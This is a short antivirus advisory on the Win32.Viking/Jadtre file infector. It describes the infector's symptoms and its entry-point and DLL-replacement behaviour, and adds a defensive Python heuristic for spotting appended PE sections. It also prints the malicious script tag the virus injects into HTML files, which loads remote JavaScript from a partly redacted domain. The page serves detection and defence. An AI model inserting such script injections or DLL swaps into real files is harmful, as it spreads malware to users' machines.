
Win32.Viking.Gen


First posted on 21 November 2011.
Source: BitDefender

Aliases:

Win32.Viking.Gen is also known as Win32.Jadtre.Gen.

Explanation:

You may be infected with Viking/Jadtre if:

- there is a hidden autorun.inf created on a removable device, alongside a hidden recycle.{random-string} folder and another hidden folder with a random name.

- the hosts file has been modified without the user’s consent:

  - the hosts file does not include its original comments.

  - the hosts file has been emptied of all the IPs you may have added to it, other than the localhost IP.

Viking/Jadtre infects executable files by creating its own section and modifying the entry point so that the virus is executed first, allowing itself to spread. After that, the executable is run normally (except for when it is an installer, because some versions of Viking/Jadtre compromise installers).
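The entry-point rewrite described above lends itself to a simple triage heuristic. The following is an added example and is not BitDefender's detection logic nor code from the original page: a minimal PE header walk that reports whether the entry point lands in the last section, in a writable section, or in a section not marked as code. The `build_pe` helper and the `.added` section name are constructed here purely so the heuristic can be exercised without a real sample.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes):
    """Return (entry_rva, [(name, va, vsize, characteristics), ...]) for a PE image."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]    # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]  # AddressOfEntryPoint (same offset in PE32/PE32+)
    table = pe + 24 + opt_size                               # section table follows the optional header
    sections = []
    for i in range(nsec):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va = struct.unpack_from("<II", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, va, vsize, chars))
    return entry, sections


def entry_point_findings(data: bytes):
    """Heuristics for an appended-section infector; returns a list of reasons (empty if nothing odd)."""
    entry, sections = parse_pe(data)
    hit = next((i for i, (_, va, vs, _) in enumerate(sections) if va <= entry < va + max(vs, 1)), None)
    if hit is None:
        return ["entry point outside every section"]
    name, _, _, chars = sections[hit]
    findings = []
    if hit == len(sections) - 1 and len(sections) > 1:
        findings.append(f"entry point in last section {name!r}")
    if chars & IMAGE_SCN_MEM_WRITE:
        findings.append(f"entry section {name!r} is writable")
    if not chars & IMAGE_SCN_CNT_CODE:
        findings.append(f"entry section {name!r} is not marked as code")
    return findings


def build_pe(sections, entry_rva):
    """Constructed minimal PE32 header (no real code) used only to exercise the heuristics."""
    img = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))       # e_lfanew -> 0x40
    opt = bytearray(96)                                                  # only Magic and EP are filled
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102) + opt
    for name, va, vsize, chars in sections:
        img += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, vsize, 0, 0, 0, 0, 0, chars)
    return bytes(img)
```

Feed `entry_point_findings` the bytes of a file to triage; a clean binary normally returns an empty list, while an appended infector section tends to trip the last-section and writable checks.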

Some versions of Viking/Jadtre also infect HTML files by appending a malicious script:

<script language=javascript src=http://www.ha[removed].com/js/w.js></script>

The virus deletes DLLs from the system32 folder and copies itself in their place using the same name (e.g. appmgmts.dll, qmgr.dll, ntmssvc.dll), and sometimes creates a DLL called dmutilio.dll. It also creates .sys files in system32 with random names and registers them as services.

Last update 21 November 2011
